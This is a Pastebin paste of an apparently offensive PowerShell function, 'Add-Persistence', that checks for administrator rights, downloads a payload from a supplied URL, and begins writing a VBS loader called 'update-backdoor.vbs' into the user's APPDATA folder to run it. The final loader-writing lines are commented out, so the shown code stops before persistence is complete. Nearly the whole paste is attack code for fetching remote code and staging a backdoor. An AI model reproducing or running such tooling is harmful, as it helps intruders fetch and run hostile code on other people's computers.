Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function Add-Persistence()
- {
- param
- (
- [parameter(Mandatory=$true)]
- [string]
- $payloadurl
- )
- # Default saving the payload to the %TEMP% directory
- $tmpdir = $env:APPDATA
- # Change this if desired.
- $payloadvbsloaderpath = "$tmpdir\update-backdoor.vbs"
- # Determine if user is admin. Not required, but nice to know.
- $admin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
- if ($admin -eq $true)
- { Write-Host "[+] User is a local administrator!" }
- else
- { Write-Host "[-] User is not a local administrator." }
- # Download and verify the payload.
- Write-Host "[+] Downloading payload $payloadurl"
- $payload = (New-Object Net.WebClient).DownloadString($payloadurl)
- $payloadlength = $payload.Length
- if ($payloadlength -gt 0)
- { Write-Host "[+] Payload length: $payloadlength bytes" }
- else
- {
- Write-Host "[!] Payload length: 0 characters. Is the web server up?"
- return
- }
- # Create the VBS file and insert the powershell command from unicorn.
- Write-Host "[+] Creating VBS loader."
- $vbs = ""
- # $vbs += "ps = ""$payload""`r`n"
- # $vbs += "oShell.run(ps),0,true"
- # $vbs | Out-File $payloadvbsloaderpath -Force
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
